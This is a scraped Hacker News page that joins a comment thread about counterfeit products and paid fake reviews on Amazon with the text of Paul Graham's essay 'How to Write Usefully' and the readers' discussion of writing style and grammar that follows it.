Because they make more money than they lose as a result while driving competitors into bankruptcy. Eventually they'll make a big public spectacle of getting it fixed (once the economics stop being in their favor) and everyone will forgive them.

mrweasel(4207) 1 day ago [-]

I honestly don't think Amazon really care, unless you sell fake Amazon branded products.

agrippanux(4308) 2 days ago [-]

I started buying electronics at my local physical Best Buy. I thought 4 years ago I would never step inside a Best Buy again but a string of obvious fakes from Amazon changed my mind.

derekp7(4256) 1 day ago [-]

A couple years back I impulse purchased a Google Chromecast at a local Walmart. When I went to open it up at home, the seal looked a bit funky like it had been carefully pealed back and put back in place.

What it contained looked like a Chromecast, but was actually a knockoff, which I never could get to associate with my network or get working.

Apparently someone bought this cheap one online, didn't like it, bought the real one at Walmart and put the fake one back in the box and returned it to the store.

jtms(4318) 1 day ago [-]

I never in a million years thought I'd be suggesting this, but Walmart.com offers a similar level of convenience and I'd wager you're far less likely to receive fake stuff

Answerawake(10000) about 23 hours ago [-]

I disagree, this is an anecdote but I ordered a bag of coffee from their 'Ship to Store' option. When it came time to go to the store to pick it up, I was waiting about an hour to receive my item. Their setup is very good. You walk into the special 'pick up' area of the store, then check in. From there someone is supposed to go to the back and fetch your item. That person was nowhere to be found. After alerting the manager that person eventually showed up and then proceeded to look around for the item. They then decided to call in a colleague who then took even longer to find the item. Turns out it was in a box right in front of them. All in all I wasted an hour trying to get a small bag of coffee. I'm gonna try again because I want this thing to be successful but man was it 'nails on chalkboard' experience.

microdrum(4028) 1 day ago [-]

Unpopular / true opinion: even more Trumpian tariffs on China will help fix this problem.

sky_rw(10000) 1 day ago [-]

More unpopular / true opinion: Coronavirus will probably fix this problem.

viburnum(3184) 2 days ago [-]

I really, really hate being a sucker so for me it's never worth it to buy from Amazon anymore. I'll pay a few dollars more to avoid the stress.

gdulli(10000) 2 days ago [-]

The good news is, it's not even necessarily true that you pay more when buying elsewhere anymore. Amazon is coasting on that reputation but they're no longer subsidizing customers like they used to.

101008(10000) 2 days ago [-]

Sorry if this is offtopic, I was planning to buy a Google Pixel 3A from Amazon in a week (It's cheaper than from Google Store). Are mobile phones also forgered on Amazon? or they don't aim to forger stuff like that? Thank you. (I am from a 3rd world country and travelling to USA next week)

jschwartzi(4279) 1 day ago [-]

No, but they're extremely likely to be refurbished but sold as new. Every phone I've bought off Amazon that was sold as 'new' this was the case.

v77(10000) 1 day ago [-]

I just bought a Pixel 2 from Amazon.ca and it seems fine.

richardxia(10000) 2 days ago [-]

I would be a little bit careful. I don't know if there's a risk of counterfeiting, but I once bought what I thought was supposed to be a US region Moto X2 but instead got a European region one. The most important difference, besides getting a different power adapter, was the fact that there's actually a different wireless antennae chip, where it did not have LTE bands for my carrier in the US.

gurumeditations(10000) 2 days ago [-]

Personally, any expensive electronics I buy in person, not from Amazon. Best Buy and the like are trustworthy.

philshem(4201) 1 day ago [-]

Nitpicking, but...

the original article title is 'I Bought These Things From Amazon Prime. Can You Tell Which Ones Are Real?'.

The current HN title is 'Which of these Amazon Prime purchases are real?'

The current HN title would be improved by replacing 'real' with 'authentic'. With 'real', I started the article assuming that the Ove-Glove was a fictitious product created by a designer or artist. It took some time to realize that 'real' means 'authentic'.

mrweasel(4207) 1 day ago [-]

It also doesn't matter that it's Amazon Prime, the Prime part has no influence on whether or not you risk buying fakes.

lukebuehler(10000) 2 days ago [-]

Gutsy for them to write such an article when they rely so much on affiliate links. Definitely makes me respect The Wire Cutter much more.

Maybe does their article imply that as long as you purchase through their recommended links you'd be safe(er)?

ebg13(10000) 1 day ago [-]

> Definitely makes me respect The Wire Cutter much more.

I'll probably respect them more when they stop hypocritically linking to Amazon.

> Maybe does their article imply that as long as you purchase through their recommended links you'd be safe(er)?

The article implies that, but it's not true.

burlesona(3817) 2 days ago [-]

I agree, I thought that too. These days they almost always have two links to buy each product, I usually go for whatever isn't Amazon.

joeblau(3464) 1 day ago [-]

A few weeks ago, I bought some shampoo and conditioner from Amazon. I wanted a bulk size and the bottle looked like it was form the official manufacturer. When I got the bottles, opened and used them, I could tell they were fake. The consistency of the product was terrible and the smell was overly harsh. I returned both of them and just ordered the products from the company website. Funnily enough, the company website didn't even have the sizes that were listed on Amazon. Over time, I've become more wary of buying household products Amazon's website.

jschwartzi(4279) 1 day ago [-]

You're lucky you didn't accidentally put that stuff on your hair or face. Back before cosmetics and beauty supplies were regulated in the US, there would be occasional news stories of shampoos removing hair or causing rashes. A high school teacher showed us as an example a newspaper article from that period about mascara making several women permanently blind.

chrisseaton(3104) 2 days ago [-]

Why is buying them with a Prime subscription relevant to the story?

mjs(3033) 2 days ago [-]

The more crucial difference is that the products were sold by third party sellers. I'm assuming counterfeit goods are almost never a problem if the seller is Amazon.

Marsymars(10000) 2 days ago [-]

Because the average Amazon buyer sees 'eligible for Prime' as an Amazon-backed indicator of quality.

ryandetzel(3901) 1 day ago [-]

Ive tried to buy direct from the manufacture four times in the last two months, every single time it was more expensive than buying from amazon and these are things that are not easily faked so I'm sure they legit. One of them I contacted the manufacture to see if they would at least match the $20 difference on amazon and they said just to order it from amazon. Wtf.

asdff(10000) 1 day ago [-]

It depends on the products. Old school department store brands will have an inflated price on their site compared to amazon, but I usually find name brand electronics to be no cheaper on amazon than other sites, or even the manufacturer directly.

intopieces(4315) 2 days ago [-]

There's a follow on question that I'd like to raise, which is: 'Are you rich enough to care'? In the race to the bottom on prices, it becomes a mark of wealth when you have the time and money to verify your own purchases, or to shop at more reputable retailers. I'm in that category, but could easily see myself being too cash strapped / too busy to do anything about a fake product being shipped to me from Amazon. I'd probably shrug.

burlesona(3817) 2 days ago [-]

I mean, kinda. But you can buy most of the stuff that you'd otherwise get on Amazon from Costco, Target, or Walmart online, and not have to worry about it being a crappy knock off made with leaded paint. So, I think most people are rich enough to care that much.

throwaway122378(10000) 1 day ago [-]

Should Amazon be held liable for fake products sold on their platform the same was Facebook should be liable for fake news published on theirs?

clSTophEjUdRanu(4315) 1 day ago [-]

Yes.

However I don't consider this and what Facebook doing to be the same.

rasz(4316) 1 day ago [-]

You dont directly pay for reading fb posts. fb posts never burned anybodys house down.

tyingq(4263) 2 days ago [-]

'Getting the fake gloves removed from Amazon can be a long process, Hirsch said, taking weeks or even months of playing whack-a-mole with counterfeit sellers'

That's the brand owner saying that. I'd love to see an Amazon response to that.

Nasrudith(10000) 2 days ago [-]

Personally the brand owner makes me trust them as far as I can throw them as they have a fundamental interest in hampering secondary markets and undermining right of first sale. Sure there are valid concerns but it becomes 'CEOs claim higher CEO compensation main factor linked to better company performance'.

foxfired(2140) 1 day ago [-]

Time to pack the kids in the car and drive to your local hardware store.

No, seriously. Go to your local hardware store. If the quality of your purchase matters, then the surest way to get good quality product is to go to the store and pick it up yourself. If for some reasons you get a fake, you can drive back to the store and they'll be happy to replace it. You don't have to talk to a faceless corporation.

ken(3848) 1 day ago [-]

Great idea for some products, infeasible for others. I recently needed a Firewire cable, on a day's notice, and after much searching I concluded there's no longer any store in Seattle which sells computer components in person, especially outside of normal business hours.

The closest I found was Fry's (Renton, 30min away), and they're doing their darndest to go out of business. A Firewire cable in one of the few items they have on their shelves. It's not name-brand, and if it didn't work, I'd be SOL.

skizm(10000) 2 days ago [-]

Just add Twitter certified check marks to third party sellers. Have official amazon quality control for those sellers and everyone else is a gamble. If I buy from the Nike seller with the blue check mark, I know I'm getting the real thing. Seems like that could work.

miked85(4098) 2 days ago [-]

As long as Amazon continues to co-mingle products, that wouldn't matter.

squarefoot(4122) 2 days ago [-]

Fake reviews also contribute to more fake and low quality products being sold. It looks like Amazon simply doesn't care.

https://thehustle.co/amazon-fake-reviews

FTA:

'One stay-at-home mom from Kentucky told me she makes $200-300 per month leaving positive reviews for things like sleep masks, light bulbs, and AV cables.'

"Do you actually like the products?" I asked.

"I don't know," she wrote. "I never use them."

heavyset_go(4298) 2 days ago [-]

I posted about this on HN recently[1]. Within the last month, I've been getting an increasing amount of native ads on different platforms for 'Free [Product]!'. If you engage the ad, you find out that the ad-purchaser wants you to buy the advertised product and leave a positive review for it on Amazon, after which they'll refund you for the cost of the product.

Some of these items have thousands of positive reviews[1], which is misleading to consumers who rely on honest reviews to guide their purchasing behavior. Also, it is almost comical how difficult it is to reach out to Amazon about this issue as a user.

In the end, I just contacted my state Attorney General's Consumer Protection division and the FTC.

[1] https://news.ycombinator.com/item?id=22388067

dpacmittal(10000) 1 day ago [-]

Amazon's strategy is to create mistrust for any other product other than its in house brands.

Nasrudith(10000) 2 days ago [-]

I'll bite - how would them caring make any difference in terms of quality of 'fake' reviews?

The way I see it the problem is unsolvable. There is no mathematical way to absolutely determine truth of reviews and it is fundamentally an arms race. No measure they could do could keep it true and free of deception.

Shivetya(611) 1 day ago [-]

Well when Amazon takes steps to reduce fraud people scream to high hell about how unfair it is to the small business trying to sell product. Take the case of Apple and Amazon working a deal where Apple products can only be sold by Apple or whom Apple authorizes.

I know the headache of trying to find a Silpat cooking mat, the number of look alike fakes is astounding and worse they use the name brand when they clearly are not that manufacturer.

So the only recourse is to have a setup similar to the Amazon and Apple deal. Anyone wishing to sell a branded product must provide proof to Amazon which includes the manufacturer backing the claim that they are authorized to sell that product. Not line, by product.

nomel(10000) about 21 hours ago [-]

After spending $50 on a 'Recommended' and 'Prime' counterfeit PS4 controller (proven by a tear down), I no longer buy electronics from Amazon. With a brick and mortar, some sort of incoming quality control still seems to be in place.

Timothycquinn(10000) 1 day ago [-]

I just watched a CBC Marketplace spot on this topic. What scared me the most was the danger of toxic materials in fake products and especially makeup. Some lipsticks from brand name knock offs had had mercury levels hundreds of times higher than the maximum levels recommended by industry standards.

amdelamar(10000) 1 day ago [-]

Netflix has a short documentary on this very thing. It was really eye-opening that counterfeit makeup and cosmetics are not only bad for businesses but they can be physically harmful to the body/face, resulting in some people being rushed to the hospital.

The series is called Broken and the episode on cosmetics is 'Makeup Mayhem' https://www.netflix.com/title/81002391

mindslight(10000) 2 days ago [-]

The switcheroo problem described in the article simply does not exist say over on Ebay. On Ebay, you directly know if you are buying from a legitimate distributor, small time grey market / surplus dealer, or a knockoff shop. There are plenty of products for which knockoffs/generics are good enough, so simplistically 'banning fakes' is not the solution either. The problem is this obscuring of the actual supplier, which Amazon could fix tomorrow if their entire business didn't revolve around using that confusing UI to mislead customers with dark patterns.

I'm continually amazed at the popularity of Amazon. It goes to show how powerful advertising, social distortion, and the sunk cost fallacy ('prime') are. For example, Amazon has never had good prices on anything, and yet that myth persists. Presumably the same people that repeat this can't even be bothered to just check eg walmart.com. (Walmart does find some new way to disappoint me every time I step in there. It's just so utterly huge that it's foolish to ignore.)

greenyoda(1349) 2 days ago [-]

> On Ebay, you directly know if you are buying from a legitimate distributor, small time grey market / surplus dealer, or a knockoff shop.

Would you mind explaining how you can figure this out? (I've never bought anything on Ebay, so I'm completely ignorant about how it works.)

overcast(4273) 1 day ago [-]

How do fake reviews get past order verification? Or is that tag complete bullshit?

cddotdotslash(4148) 1 day ago [-]

There are lots of companies that will pay you the price of the item + $X to buy the product and leave the review.

gowld(10000) 1 day ago [-]

Do the math: product price times number of reviews equals cost of fake reviews.

fenwick67(10000) 2 days ago [-]

Walmart's online store is now my go-to for most household products. Free 2-day shipping without a subscription and the ability to actually vet their supply chain means it's basically always better.

aidenn0(4137) 2 days ago [-]

Doesn't wal-mart allow drop-shippers to list on their website?





Historical Discussions: How to Write Usefully (February 21, 2020: 806 points)
How to Write Usefully (February 21, 2020: 1 points)

(807) How to Write Usefully

807 points 4 days ago by r_singh in 2698th position

paulgraham.com | Estimated reading time – 16 minutes | comments | anchor

February 2020

What should an essay be? Many people would say persuasive. That's what a lot of us were taught essays should be. But I think we can aim for something more ambitious: that an essay should be useful.

To start with, that means it should be correct. But it's not enough merely to be correct. It's easy to make a statement correct by making it vague. That's a common flaw in academic writing, for example. If you know nothing at all about an issue, you can't go wrong by saying that the issue is a complex one, that there are many factors to be considered, that it's a mistake to take too simplistic a view of it, and so on.

Though no doubt correct, such statements tell the reader nothing. Useful writing makes claims that are as strong as they can be made without becoming false.

For example, it's more useful to say that Pike's Peak is near the middle of Colorado than merely somewhere in Colorado. But if I say it's in the exact middle of Colorado, I've now gone too far, because it's a bit east of the middle.

Precision and correctness are like opposing forces. It's easy to satisfy one if you ignore the other. The converse of vaporous academic writing is the bold, but false, rhetoric of demagogues. Useful writing is bold, but true.

It's also two other things: it tells people something important, and that at least some of them didn't already know.

Telling people something they didn't know doesn't always mean surprising them. Sometimes it means telling them something they knew unconsciously but had never put into words. In fact those may be the more valuable insights, because they tend to be more fundamental.

Let's put them all together. Useful writing tells people something true and important that they didn't already know, and tells them as unequivocally as possible.

Notice these are all a matter of degree. For example, you can't expect an idea to be novel to everyone. Any insight that you have will probably have already been had by at least one of the world's 7 billion people. But it's sufficient if an idea is novel to a lot of readers.

Ditto for correctness, importance, and strength. In effect the four components are like numbers you can multiply together to get a score for usefulness. Which I realize is almost awkwardly reductive, but nonetheless true.

_____

How can you ensure that the things you say are true and novel and important? Believe it or not, there is a trick for doing this. I learned it from my friend Robert Morris, who has a horror of saying anything dumb. His trick is not to say anything unless he's sure it's worth hearing. This makes it hard to get opinions out of him, but when you do, they're usually right.

Translated into essay writing, what this means is that if you write a bad sentence, you don't publish it. You delete it and try again. Often you abandon whole branches of four or five paragraphs. Sometimes a whole essay.

You can't ensure that every idea you have is good, but you can ensure that every one you publish is, by simply not publishing the ones that aren't.

In the sciences, this is called publication bias, and is considered bad. When some hypothesis you're exploring gets inconclusive results, you're supposed to tell people about that too. But with essay writing, publication bias is the way to go.

My strategy is loose, then tight. I write the first draft of an essay fast, trying out all kinds of ideas. Then I spend days rewriting it very carefully.

I've never tried to count how many times I proofread essays, but I'm sure there are sentences I've read 100 times before publishing them. When I proofread an essay, there are usually passages that stick out in an annoying way, sometimes because they're clumsily written, and sometimes because I'm not sure they're true. The annoyance starts out unconscious, but after the tenth reading or so I'm saying 'Ugh, that part' each time I hit it. They become like briars that catch your sleeve as you walk past. Usually I won't publish an essay till they're all gone — till I can read through the whole thing without the feeling of anything catching.

I'll sometimes let through a sentence that seems clumsy, if I can't think of a way to rephrase it, but I will never knowingly let through one that doesn't seem correct. You never have to. If a sentence doesn't seem right, all you have to do is ask why it doesn't, and you've usually got the replacement right there in your head.

This is where essayists have an advantage over journalists. You don't have a deadline. You can work for as long on an essay as you need to get it right. You don't have to publish the essay at all, if you can't get it right. Mistakes seem to lose courage in the face of an enemy with unlimited resources. Or that's what it feels like. What's really going on is that you have different expectations for yourself. You're like a parent saying to a child 'we can sit here all night till you eat your vegetables.' Except you're the child too.

I'm not saying no mistake gets through. For example, I added condition (c) in 'A Way to Detect Bias' after readers pointed out that I'd omitted it. But in practice you can catch nearly all of them.

There's a trick for getting importance too. It's like the trick I suggest to young founders for getting startup ideas: to make something you yourself want. You can use yourself as a proxy for the reader. The reader is not completely unlike you, so if you write about topics that seem important to you, they'll probably seem important to a significant number of readers as well.

Importance has two factors. It's the number of people something matters to, times how much it matters to them. Which means of course that it's not a rectangle, but a sort of ragged comb, like a Riemann sum.

The way to get novelty is to write about topics you've thought about a lot. Then you can use yourself as a proxy for the reader in this department too. Anything you notice that surprises you, who've thought about the topic a lot, will probably also surprise a significant number of readers. And here, as with correctness and importance, you can use the Morris technique to ensure that you will. If you don't learn anything from writing an essay, don't publish it.

You need humility to measure novelty, because acknowledging the novelty of an idea means acknowledging your previous ignorance of it. Confidence and humility are often seen as opposites, but in this case, as in many others, confidence helps you to be humble. If you know you're an expert on some topic, you can freely admit when you learn something you didn't know, because you can be confident that most other people wouldn't know it either.

The fourth component of useful writing, strength, comes from two things: thinking well, and the skillful use of qualification. These two counterbalance each other, like the accelerator and clutch in a car with a manual transmission. As you try to refine the expression of an idea, you adjust the qualification accordingly. Something you're sure of, you can state baldly with no qualification at all, as I did the four components of useful writing. Whereas points that seem dubious have to be held at arm's length with perhapses.

As you refine an idea, you're pushing in the direction of less qualification. But you can rarely get it down to zero. Sometimes you don't even want to, if it's a side point and a fully refined version would be too long.

Some say that qualifications weaken writing. For example, that you should never begin a sentence in an essay with 'I think,' because if you're saying it, then of course you think it. And it's true that 'I think x' is a weaker statement than simply 'x.' Which is exactly why you need 'I think.' You need it to express your degree of certainty.

But qualifications are not scalars. They're not just experimental error. There must be 50 things they can express: how broadly something applies, how you know it, how happy you are it's so, even how it could be falsified. I'm not going to try to explore the structure of qualification here. It's probably more complex than the whole topic of writing usefully. Instead I'll just give you a practical tip: Don't underestimate qualification. It's an important skill in its own right, not just a sort of tax you have to pay in order to avoid saying things that are false. So learn and use its full range. It may not be fully half of having good ideas, but it's part of having them.

There's one other quality I aim for in essays: to say things as simply as possible. But I don't think this is a component of usefulness. It's more a matter of consideration for the reader. And it's a practical aid in getting things right; a mistake is more obvious when expressed in simple language. But I'll admit that the main reason I write simply is not for the reader's sake or because it helps get things right, but because it bothers me to use more or fancier words than I need to. It seems inelegant, like a program that's too long.

I realize florid writing works for some people. But unless you're sure you're one of them, the best advice is to write as simply as you can.

_____

I believe the formula I've given you, importance + novelty + correctness + strength, is the recipe for a good essay. But I should warn you that it's also a recipe for making people mad.

The root of the problem is novelty. When you tell people something they didn't know, they don't always thank you for it. Sometimes the reason people don't know something is because they don't want to know it. Usually because it contradicts some cherished belief. And indeed, if you're looking for novel ideas, popular but mistaken beliefs are a good place to find them. Every popular mistaken belief creates a dead zone of ideas around it that are relatively unexplored because they contradict it.

The strength component just makes things worse. If there's anything that annoys people more than having their cherished assumptions contradicted, it's having them flatly contradicted.

Plus if you've used the Morris technique, your writing will seem quite confident. Perhaps offensively confident, to people who disagree with you. The reason you'll seem confident is that you are confident: you've cheated, by only publishing the things you're sure of. It will seem to people who try to disagree with you that you never admit you're wrong. In fact you constantly admit you're wrong. You just do it before publishing instead of after.

And if your writing is as simple as possible, that just makes things worse. Brevity is the diction of command. If you watch someone delivering unwelcome news from a position of inferiority, you'll notice they tend to use lots of words, to soften the blow. Whereas to be short with someone is more or less to be rude to them.

It can sometimes work to deliberately phrase statements more weakly than you mean. To put 'perhaps' in front of something you're actually quite sure of. But you'll notice that when writers do this, they usually do it with a wink.

I don't like to do this too much. It's cheesy to adopt an ironic tone for a whole essay. I think we just have to face the fact that elegance and curtness are two names for the same thing.

You might think that if you work sufficiently hard to ensure that an essay is correct, it will be invulnerable to attack. That's sort of true. It will be invulnerable to valid attacks. But in practice that's little consolation.

In fact, the strength component of useful writing will make you particularly vulnerable to misrepresentation. If you've stated an idea as strongly as you could without making it false, all anyone has to do is to exaggerate slightly what you said, and now it is false.

Much of the time they're not even doing it deliberately. One of the most surprising things you'll discover, if you start writing essays, is that people who disagree with you rarely disagree with what you've actually written. Instead they make up something you said and disagree with that.

For what it's worth, the countermove is to ask someone who does this to quote a specific sentence or passage you wrote that they believe is false, and explain why. I say 'for what it's worth' because they never do. So although it might seem that this could get a broken discussion back on track, the truth is that it was never on track in the first place.

Should you explicitly forestall likely misinterpretations? Yes, if they're misinterpretations a reasonably smart and well-intentioned person might make. In fact it's sometimes better to say something slightly misleading and then add the correction than to try to get an idea right in one shot. That can be more efficient, and can also model the way such an idea would be discovered.

But I don't think you should explicitly forestall intentional misinterpretations in the body of an essay. An essay is a place to meet honest readers. You don't want to spoil your house by putting bars on the windows to protect against dishonest ones. The place to protect against intentional misinterpretations is in end-notes. But don't think you can predict them all. People are as ingenious at misrepresenting you when you say something they don't want to hear as they are at coming up with rationalizations for things they want to do but know they shouldn't. I suspect it's the same skill.

_____

As with most other things, the way to get better at writing essays is to practice. But how do you start? Now that we've examined the structure of useful writing, we can rephrase that question more precisely. Which constraint do you relax initially? The answer is, the first component of importance: the number of people who care about what you write.

If you narrow the topic sufficiently, you can probably find something you're an expert on. Write about that to start with. If you only have ten readers who care, that's fine. You're helping them, and you're writing. Later you can expand the breadth of topics you write about.

The other constraint you can relax is a little surprising: publication. Writing essays doesn't have to mean publishing them. That may seem strange now that the trend is to publish every random thought, but it worked for me. I wrote what amounted to essays in notebooks for about 15 years. I never published any of them and never expected to. I wrote them as a way of figuring things out. But when the web came along I'd had a lot of practice.

Incidentally, Steve Wozniak did the same thing. In high school he designed computers on paper for fun. He couldn't build them because he couldn't afford the components. But when Intel launched 4K DRAMs in 1975, he was ready.

_____

How many essays are there left to write though? The answer to that question is probably the most exciting thing I've learned about essay writing. Nearly all of them are left to write.

Although the essay is an old form, it hasn't been assiduously cultivated. In the print era, publication was expensive, and there wasn't enough demand for essays to publish that many. You could publish essays if you were already well known for writing something else, like novels. Or you could write book reviews that you took over to express your own ideas. But there was not really a direct path to becoming an essayist. Which meant few essays got written, and those that did tended to be about a narrow range of subjects.

Now, thanks to the internet, there's a path. Anyone can publish essays online. You start in obscurity, perhaps, but at least you can start. You don't need anyone's permission.

It sometimes happens that an area of knowledge sits quietly for years, till some change makes it explode. Cryptography did this to number theory. The internet is doing it to the essay.

The exciting thing is not that there's a lot left to write, but that there's a lot left to discover. There's a certain kind of idea that's best discovered by writing essays. If most essays are still unwritten, most such ideas are still undiscovered.

Notes

[1] Put railings on the balconies, but don't put bars on the windows.

[2] Even now I sometimes write essays that are not meant for publication. I wrote several to figure out what Y Combinator should do, and they were really helpful.

Thanks to Trevor Blackwell, Daniel Gackle, Jessica Livingston, and Robert Morris for reading drafts of this.




All Comments: [-] | anchor

contingencies(3293) 4 days ago [-]

Niven's First Law of Writing: Writers who write for other writers should write letters. - Larry Niven, science fiction author (1989)

Blind monkey at the typewriter. - Robert Burnham Jr., Astronomer (1983)

We'll need writers who can remember freedom - poets, visionaries - realists of a larger reality. - Ursula K. Le Guin

The writer is that person who, embarking upon her task, does not know what to do. - Donald Barthelme

There can be no reliable biography of a writer, 'because a writer is too many people if he is any good'. - Andrew O'Hagan

Summary of advice from writers: Advice from writers is useful, and not only about naming. Writers have been at it for centuries; programming is merely decades old. Also, their advice is better written. And funnier. - Peter Hilton

... from https://github.com/globalcitizen/taoup

(Edit: One of PG's main points here is succinctly summarized by this other pithy taoup quote: Lest men suspect your tale untrue, keep probability in view. - John Gay (1727))

soneca(1544) 4 days ago [-]

Aren't these quotes about fiction writing? Do you think they apply to essay writing as well?

I don't think I got your point with this selection of quotes, if you don't mind explaining.

firatcan(4310) 4 days ago [-]

Hello guys,

I don't know if it's right place to ask this, but do you guys have any other resources that I can learn how to write great essays.

Because I have started to write essays at our startups blog which is called www.jooseph.com . It is basically playlists for learning. This resources would be really helpful for me to create a list for how to write great essay and also teach myself to how write great essays. Thanks in advance

CaptArmchair(10000) 4 days ago [-]

You want to read Umberto Eco's seminal 'How to write a thesis'. Not quite the same as an essay. But it does contain tons of good stuff on writing.

seemslegit(10000) 4 days ago [-]

A true test of good writing is the test of time, the following for example was written 15 years ago and remains relevant: https://idlewords.com/2005/04/dabblers_and_blowhards.htm

vasilipupkin(4269) 4 days ago [-]

Wow, I'm not impressed with this at all It's obvious to anyone what the ways are in which hackers and painters are completely different. Does anyone really need to write lots of vacuous commentary on this ? On the other hand, the ways in which they are similar are actually interesting to think about.

rdiddly(10000) 4 days ago [-]

I challenge you to ignore previous history and reputation, and evaluate this essay in isolation and according to the very principles it lays out. Do we agree with the apparent presupposition that this person has valuable instruction to give us on writing?

Ditto for correctness, importance, and strength. In effect the four components are like numbers you can multiply together to get a score for usefulness. Which I realize is almost awkwardly reductive, but nonetheless true.

gist(2274) 4 days ago [-]

Noting also that from my quick reading (note the qualifier there btw) I am not seeing the issue of having people review the essay mentioned. Most people not only don't have this luxury but we also don't know the contributions that those reviews have made (or corrections) to the essay.

To me (note the qualifier to lessen the impact there) writing is immediate and driven by emotion. To much time lessens the ability to say what you really think and having others review what you wrote even more so.

abrax3141(3009) 4 days ago [-]

Saying that you should write useful essays isn't really saying anything. Presumably you should only do anything that's useful. (Which is not to say that everyone always does so.) Being useful is a less stringent requirement than being persuasive, so it's actually less ambitious, not more so.

soneca(1544) 4 days ago [-]

For me it said a lot. Because he doesn't stop at the title, it's not a tweet, he goes on to properly explain what he consider usefulness and how to achieve it. And the idea that I should aim to being useful and not persuasive is pretty powerful to me. I do think is more ambitious to be useful in the way the described than just persuasive.

r3vrse(10000) 4 days ago [-]

Convey a singular point with intent. Below is first paragraph rewritten. Just my 2¢.

---

Essays should be persuasive. But we can aim for something more ambitious: that an essay should be useful.

Useful writing makes a strong claim without resorting to falsehoods.

It is more useful to say that Pike's Peak is in the center of Colorado than somewhere within.

Precision and correctness are like opposing forces. Useful writing is bold and true. It tells people something important, that they might not have known, without resorting to manufactured surprise or equivocality. This is formative of fundamental insights.

Any idea will not be novel to all, but may still have impact for the many.

In argument: be correct, be important, be strong. This will ensure usefulness.

iainmerrick(4317) 4 days ago [-]

It is more useful to say that Pike's Peak is in the center of Colorado than somewhere within.

This kind of thing is taking terseness too far, I think. If I'm not immediately familiar with Pike's Peak it takes me a moment to unpack your meaning, but I immediately understood the more verbose explanation in the original.

TimPC(10000) 4 days ago [-]

I think this deletes an important sentence. The comment about saying Pike's peak is in the centre of Colorado being inaccurate and that you can only say it's near the centre is showing an example of precision and correctness being opposites. You've lost the point of the example in your paragraph and the sentence suddenly seems like a completely random insertion.

say_it_as_it_is(3987) 4 days ago [-]

PG speaks of writing usefully while not writing well. Many of his sentences are phrases. The subject of his sentence is often unclear. He begins sentences with the preposition, 'But'. Yet, his writing remains useful. I'd rather the latter than the former if I had to choose, but considering the volume that he writes, it's surprising that he hasn't put effort into writing well. He just doesn't care to improve his work.

injb(10000) 4 days ago [-]

quote: '...with the preposition, 'But'. Yet, his writing...'

The word 'but' is a conjunction, like 'yet'. Oh, the ironing!

hndc(10000) 4 days ago [-]

In 'But I think we can aim...', 'but' is a conjunction, not a preposition

Also, his writing is fine: simple but clear and effective.

'Many of his sentences are phrases' — literally every sentence in this essay is a complete sentence. What are you talking about?

cneurotic(4017) 4 days ago [-]

Entering pedantic mode:

'But,' in Paul's usage, isn't a preposition. And starting sentences with prepositions isn't considered 'incorrect' by most grammarians[0]. Or even bad style.

If it's good enough for the Bible[1], it's probably good enough for you.

[0]https://wordcounter.net/blog/2016/10/26/102560_can-you-start...

[1]https://biblehub.com/nlt/genesis/31.htm

TimPC(10000) 4 days ago [-]

Starting a sentence with But is perfectly fine as long as it's actually starting a sentence. We get to not to in grammar school only because starting a 'sentence' with But often turns that 'sentence' into a phrase.

jackconway(10000) 4 days ago [-]

There's nothing wrong with starting a sentence with 'but.'

hnarn(10000) 4 days ago [-]

Starting a sentence with 'But I think we can' is neither incorrect, nor is it a preposition.

mellavora(3974) 4 days ago [-]

This is something up with which we will not put!

--Winston Churchill.

throwawaylolx(10000) 4 days ago [-]

>He just doesn't care to improve his work.

Alternatively, you may overestimate how objective these rules are and how much they must correlate with some universal metric for good writing.

dragonwriter(4317) 4 days ago [-]

> He begins sentences with the preposition, 'But'.

But "but", in the use in question, is a conjunction. With which one should be less concerned about starting a sentence than one would be about a preposition.

gandutraveler(4220) 4 days ago [-]

The other day I was helping friend with an essay and i realized how 12 years in software programming has changed my writing style. Now it seems very awkward to think and write in long paragraphs. It feels more natural to use bullet points for everything.

Cthulhu_(3953) 4 days ago [-]

I know the feeling; when preparing to write a blog post or a presentation I tend to start off with bullet points.

Mind you once I have that down I can churn out improbable amounts of text in a relatively short amount of time. The main challenge for me is to stop writing and remove unnecessary text, which is kinda hard to do given how much nuance is in code.

I mean I've been thinking of writing a post (and a knowledge sharing session with my mostly C writing, older generation developer colleagues) about modern development and I was already thinking of painting a picture of how things were 10+ years ago.

netcan(4216) 4 days ago [-]

I think this is a very modern thing... because internet.

'The medium is the message' applies to writing more than anything. The medium has been rapidly evolving.

Average people wrote very little pre-PC, and the contexts are totally different. Much higher rates of output, frequency, etc. Bullet point style is good for information dense messages, provided they are short enough. We do a lot of this now, it's how we 'talk' at work.

The style isn't new, it's just that many more of us have a use for it today. In the past, it was common in a military context, for example..

_Nat_(10000) 4 days ago [-]

> What should an essay be? Many people would say persuasive. That's what a lot of us were taught essays should be.

Yeah, essays written for a class on persuasive writing should be persuasive. Because that's what the class is about -- students are supposed to be learning how to express their ideas about how things should be done to, e.g., their boss, coworkers, clients, potential investors, etc..

However, I hope no one's under the misimpression that all writing should be persuasive writing. Schools also teach classes on other types of writing, e.g. creative writing and technical writing.

dragonwriter(4317) 4 days ago [-]

> Yeah, essays written in a class that's focusing on persuasive writing should be persuasive. Because that's what the class is about

The five paragraph essay which is typically taught as a foundational expository/analytical writing tool is actually quite poor for analytical writing, and not great for expository writing, but heavily leans on the rule of threes which is a guideline for persuasive communication.

> Schools also teach classes on other types of writing, e.g. creative writing and technical writing.

K-12 often has creative writing as an elective, and often includes assignments which are superficially intended to be something other than persuasive writing on other contexts, but rarely does much to teach techniques appropriate to writing other than persuasive.

luord(1948) 4 days ago [-]

Interestingly, I saw an example of the phenomenon of people getting mad at the certainty of an essay in this very site, a few days ago.

Someone was telling the author that he would achieve more if he phrased his point in a more 'polite' way, just because the certainty of the writing made the critic mad. Thankfully, the author was here in the comments responding, and he didn't budge.

That interaction was very refreshing for that very reason: The author was right, knew he was right, someone didn't like that the author knew he was right, but the author remained steadfast.

xkemp(10000) 4 days ago [-]

I believe people arguing 'politeness' are missing the point, though. What I most value is 'dialectics' (not sure if that term is commonly used in English).

I. e. the willingness to entertain the best argument against your position in good faith. Two people who are excellent in doing so (and familiar to HN) would be Scott Alexander of slatestarcodex, and Matt Levine at Bloomberg.

(Someone rather bad at it, usually arguing against some caricature of what he imagines his opposition to be, and generally tending towards the 'either unactionable, obvious, or wrong' end of the spectrum is, well, Paul Graham.)

AgentME(10000) 4 days ago [-]

